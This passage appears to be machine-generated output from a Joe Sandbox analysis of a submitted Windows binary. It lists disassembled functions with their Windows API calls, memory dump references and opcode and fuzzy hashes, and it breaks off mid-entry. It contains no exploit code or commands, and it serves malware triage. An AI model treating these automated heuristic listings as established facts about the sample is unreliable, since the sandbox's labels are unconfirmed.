                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                              • String ID:
                                              • API String ID: 1552873950-0
                                              • Opcode ID: 464ebd311e0b84417835fdca97f39b05a871d491f27d7685db559b23c3b03983
                                              • Instruction ID: 3cd9946dd38b378b7dbcecea6b77675e0c77df7cf9095d83fc755e65d5618c96
                                              • Opcode Fuzzy Hash: 464ebd311e0b84417835fdca97f39b05a871d491f27d7685db559b23c3b03983
                                              • Instruction Fuzzy Hash: 09514CB1904218AFDF259F65CC85AEEBBB9EF48304F1044EEB61DA3241DB715A81CF58
                                              Function 00BD97F4 Relevance: 6.1, APIs: 4, Instructions: 140COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetWindowRect.USER32(00F9F808,?), ref: 00BD9863
                                              • ScreenToClient.USER32(00000002,00000002), ref: 00BD9896
                                              • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00BD9903
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Window$ClientMoveRectScreen
                                              • String ID:
                                              • API String ID: 3880355969-0
                                              • Opcode ID: 95b859bba75e903bdad6bcd69e8a00679b12e7a70f8ef912eb9e674c9a394c2b
                                              • Instruction ID: ce2576db004739cd302633c6bd95ee27cdf058ad6ac1f17b6d70ab8013d48aef
                                              • Opcode Fuzzy Hash: 95b859bba75e903bdad6bcd69e8a00679b12e7a70f8ef912eb9e674c9a394c2b
                                              • Instruction Fuzzy Hash: 4B512E34A01205EFDF14CF58C890AAEBBF5FB46760F14819AF8559B3A0E731AD41DB90
                                              Function 00BA9A80 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00BA9AD2
                                              • __itow.LIBCMT ref: 00BA9B03
                                                • Part of subcall function 00BA9D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00BA9DBE
                                              • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00BA9B6C
                                              • __itow.LIBCMT ref: 00BA9BC3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: MessageSend$__itow
                                              • String ID:
                                              • API String ID: 3379773720-0
                                              • Opcode ID: e29dedd417d2e7a07adf6d2ae059d8b3d75dfc90ca17e22f1f041e2312e75518
                                              • Instruction ID: 41de0057ec24aceab37786a28a768c0fba53756b935982b183fe03873a0931fa
                                              • Opcode Fuzzy Hash: e29dedd417d2e7a07adf6d2ae059d8b3d75dfc90ca17e22f1f041e2312e75518
                                              • Instruction Fuzzy Hash: 2941AE70A04208ABDF25EF54D885BEE7BF9EF49711F0040E9F905A7291DB709A48DBA1
                                              Function 00BBB7F4 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00BBB89E
                                              • GetLastError.KERNEL32(?,00000000), ref: 00BBB8C4
                                              • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00BBB8E9
                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00BBB915
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: CreateHardLink$DeleteErrorFileLast
                                              • String ID:
                                              • API String ID: 3321077145-0
                                              • Opcode ID: bec12549fd1a91f05d0e8130838dc64f4a4369cdbcbed99725f2e4f1e9383f56
                                              • Instruction ID: 4d4629bc6db0578237c1f6a490fcc52da41b01307c79b6c992d4d18068d3ad8b
                                              • Opcode Fuzzy Hash: bec12549fd1a91f05d0e8130838dc64f4a4369cdbcbed99725f2e4f1e9383f56
                                              • Instruction Fuzzy Hash: 8241F839600A11DFCB11EF15C495A69BBE1EF8A350F1980D9ED4AAB362CB70FD05CB91
                                              Function 00BD8851 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                                              Download Yara Rule
                                              APIs
                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00BD88DE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: InvalidateRect
                                              • String ID:
                                              • API String ID: 634782764-0
                                              • Opcode ID: 46bebe05d0d62edfb1480d6a916f5a1da238e919cbb657ea147ce00ad358ea97
                                              • Instruction ID: 68229a53e27b7bf606957fde51e477739ad15f4f812edd1f6b514f7773ec30df
                                              • Opcode Fuzzy Hash: 46bebe05d0d62edfb1480d6a916f5a1da238e919cbb657ea147ce00ad358ea97
                                              • Instruction Fuzzy Hash: 1031E534604108EFEB249A18DCA5FBCFBE5EB06312F944193F991D63E1EE35D9409752
                                              Function 00BDAB37 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • ClientToScreen.USER32(?,?), ref: 00BDAB60
                                              • GetWindowRect.USER32(?,?), ref: 00BDABD6
                                              • PtInRect.USER32(?,?,00BDC014), ref: 00BDABE6
                                              • MessageBeep.USER32(00000000), ref: 00BDAC57
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Rect$BeepClientMessageScreenWindow
                                              • String ID:
                                              • API String ID: 1352109105-0
                                              • Opcode ID: f15e12474e69360b45f19a398f47dfd5c0908aed430e2e98e54a5243a1f5f248
                                              • Instruction ID: 92b4b032e3bafa4b72fd330bccd9e358a208f52caffe11d4d3bbc1a6dd1515d8
                                              • Opcode Fuzzy Hash: f15e12474e69360b45f19a398f47dfd5c0908aed430e2e98e54a5243a1f5f248
                                              • Instruction Fuzzy Hash: BC416E30610119DFDB11DF58D894BA9FBF5FB4A320F1880EAE8159B361E730E941CB92
                                              Function 00B861C5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00B861FB
                                              • __isleadbyte_l.LIBCMT ref: 00B86229
                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00B86257
                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00B8628D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                              • String ID:
                                              • API String ID: 3058430110-0
                                              • Opcode ID: e9759f2d23affa7b0a741bd051cdb290a9a325a7dc31c1656b480a45e855da7f
                                              • Instruction ID: 2f965c09303f10921f210a15c93e872f26a801f390f14849dea16f97f2f2ecd0
                                              • Opcode Fuzzy Hash: e9759f2d23affa7b0a741bd051cdb290a9a325a7dc31c1656b480a45e855da7f
                                              • Instruction Fuzzy Hash: 9A31CD30604246AFDF22AF64CC48BBA7BE9FF41310F1540E9E824971A1EB31E950DB90
                                              Function 00BD4EEE Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetForegroundWindow.USER32 ref: 00BD4F02
                                                • Part of subcall function 00BB3641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00BB365B
                                                • Part of subcall function 00BB3641: GetCurrentThreadId.KERNEL32 ref: 00BB3662
                                                • Part of subcall function 00BB3641: AttachThreadInput.USER32(00000000,?,00BB5005), ref: 00BB3669
                                              • GetCaretPos.USER32(?), ref: 00BD4F13
                                              • ClientToScreen.USER32(00000000,?), ref: 00BD4F4E
                                              • GetForegroundWindow.USER32 ref: 00BD4F54
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                              • String ID:
                                              • API String ID: 2759813231-0
                                              • Opcode ID: a21059fe620662ef6173b96d31cd446aed25acff390b252ac2b5522ed045dd6b
                                              • Instruction ID: ef64bbb4fdb1a28e3a18758f6777d5c4b9de4b8078e82128a75678d479eb71ed
                                              • Opcode Fuzzy Hash: a21059fe620662ef6173b96d31cd446aed25acff390b252ac2b5522ed045dd6b
                                              • Instruction Fuzzy Hash: A4310171D00108AFDB00EFA5C885AEFB7F9EF58300F1044AAE815E7251EB719E058BA0
                                              Function 00BA8656 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00BA810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00BA8121
                                                • Part of subcall function 00BA810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00BA812B
                                                • Part of subcall function 00BA810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00BA813A
                                                • Part of subcall function 00BA810A: RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 00BA8141
                                                • Part of subcall function 00BA810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00BA8157
                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00BA86A3
                                              • _memcmp.LIBCMT ref: 00BA86C6
                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00BA86FC
                                              • HeapFree.KERNEL32(00000000), ref: 00BA8703
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Heap$InformationProcessToken$AllocateErrorFreeLastLookupPrivilegeValue_memcmp
                                              • String ID:
                                              • API String ID: 2182266621-0
                                              • Opcode ID: 6b18ad5e18c4b435df752357e812ce088897064609b0811100afc636d27520e7
                                              • Instruction ID: c8cac99c2fa3c07f7cfedddd4996b497d776d812b0d5ef0d7f6439acc3feffbd
                                              • Opcode Fuzzy Hash: 6b18ad5e18c4b435df752357e812ce088897064609b0811100afc636d27520e7
                                              • Instruction Fuzzy Hash: D8219071E45109EFEB10DFA8CA49BEEB7F8EF45305F158099E455A7240EB30AE09CB90
                                              Function 00B7098C Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                              Download Yara Rule
                                              APIs
                                              • __setmode.LIBCMT ref: 00B709AE
                                                • Part of subcall function 00B55A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00BB7896,?,?,00000000), ref: 00B55A2C
                                                • Part of subcall function 00B55A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00BB7896,?,?,00000000,?,?), ref: 00B55A50
                                              • _fprintf.LIBCMT ref: 00B709E5
                                              • OutputDebugStringW.KERNEL32(?), ref: 00BA5DBB
                                                • Part of subcall function 00B74AAA: _flsall.LIBCMT ref: 00B74AC3
                                              • __setmode.LIBCMT ref: 00B70A1A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                              • String ID:
                                              • API String ID: 521402451-0
                                              • Opcode ID: daa0cb0f8198a74a5480821b5da4d452e5d06cbefefb993592f8eea8537b2ac3
                                              • Instruction ID: d5466c657344e2b6bcc742b1407544c368ca661b81b24687dd849c669a6f48d5
                                              • Opcode Fuzzy Hash: daa0cb0f8198a74a5480821b5da4d452e5d06cbefefb993592f8eea8537b2ac3
                                              • Instruction Fuzzy Hash: EB113A31908608BFDB04B7B49C86AFE77E8DF42322F2481E6F52957192EF705D4687A1
                                              Function 00BC1767 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00BC17A3
                                                • Part of subcall function 00BC182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00BC184C
                                                • Part of subcall function 00BC182D: InternetCloseHandle.WININET(00000000), ref: 00BC18E9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Internet$CloseConnectHandleOpen
                                              • String ID:
                                              • API String ID: 1463438336-0
                                              • Opcode ID: a5603b7b2e016a81f07e2f16b6e9678bb91c32f6b58a5670da90aa10ae08702a
                                              • Instruction ID: fb625cca2fc04c7cb31271128541144cf6e72ff9b7e8103ce747f40803c95701
                                              • Opcode Fuzzy Hash: a5603b7b2e016a81f07e2f16b6e9678bb91c32f6b58a5670da90aa10ae08702a
                                              • Instruction Fuzzy Hash: FD212371208601BFEB128F64CC40FBABBE9FF4A701F10442EFA01A7652DB31D810A7A0
                                              Function 00BB3A2A Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetFileAttributesW.KERNEL32(?,00BDFAC0), ref: 00BB3A64
                                              • GetLastError.KERNEL32 ref: 00BB3A73
                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 00BB3A82
                                              • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00BDFAC0), ref: 00BB3ADF
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: CreateDirectory$AttributesErrorFileLast
                                              • String ID:
                                              • API String ID: 2267087916-0
                                              • Opcode ID: 6bcd18dbd0f621efa23a95c0c1d6af14d175efdcbd0ff1e882a6296109f1fe8d
                                              • Instruction ID: b0674166f028431dc7099248bb3d81a7e60a11efe3d5398fd25da0e80cc2ef74
                                              • Opcode Fuzzy Hash: 6bcd18dbd0f621efa23a95c0c1d6af14d175efdcbd0ff1e882a6296109f1fe8d
                                              • Instruction Fuzzy Hash: 9B21D8745082019F8310DF24D8918BEB7E4EF55764F244AAEF4D9C72A1EB71DE09CB42
                                              Function 00BADCBE Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00BAF0BC: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00BADCD3,?,?,?,00BAEAC6,00000000,000000EF,00000119,?,?), ref: 00BAF0CB
                                                • Part of subcall function 00BAF0BC: lstrcpyW.KERNEL32(00000000,?,?,00BADCD3,?,?,?,00BAEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00BAF0F1
                                                • Part of subcall function 00BAF0BC: lstrcmpiW.KERNEL32(00000000,?,00BADCD3,?,?,?,00BAEAC6,00000000,000000EF,00000119,?,?), ref: 00BAF122
                                              • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00BAEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00BADCEC
                                              • lstrcpyW.KERNEL32(00000000,?,?,00BAEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00BADD12
                                              • lstrcmpiW.KERNEL32(00000002,cdecl,?,00BAEAC6,00000000,000000EF,00000119,?,?,00000000), ref: 00BADD46
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: lstrcmpilstrcpylstrlen
                                              • String ID: cdecl
                                              • API String ID: 4031866154-3896280584
                                              • Opcode ID: 4bde18c0d8caad9d8ac8705cd8aae8e7680afd9648cf674a8e294a88895a6e94
                                              • Instruction ID: ee9fdd17f1f90df0d15e94ef4235979443c608137007e54e5d80360c7df0ae29
                                              • Opcode Fuzzy Hash: 4bde18c0d8caad9d8ac8705cd8aae8e7680afd9648cf674a8e294a88895a6e94
                                              • Instruction Fuzzy Hash: C011D03A204306EFCB25AF74C845DBA77E9FF46350B4080BAF856CB2A0EB719941C790
                                              Function 00B850E2 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • _free.LIBCMT ref: 00B85101
                                                • Part of subcall function 00B7571C: __FF_MSGBANNER.LIBCMT ref: 00B75733
                                                • Part of subcall function 00B7571C: __NMSG_WRITE.LIBCMT ref: 00B7573A
                                                • Part of subcall function 00B7571C: RtlAllocateHeap.NTDLL(00F80000,00000000,00000001), ref: 00B7575F
                                              Memory Dump Source
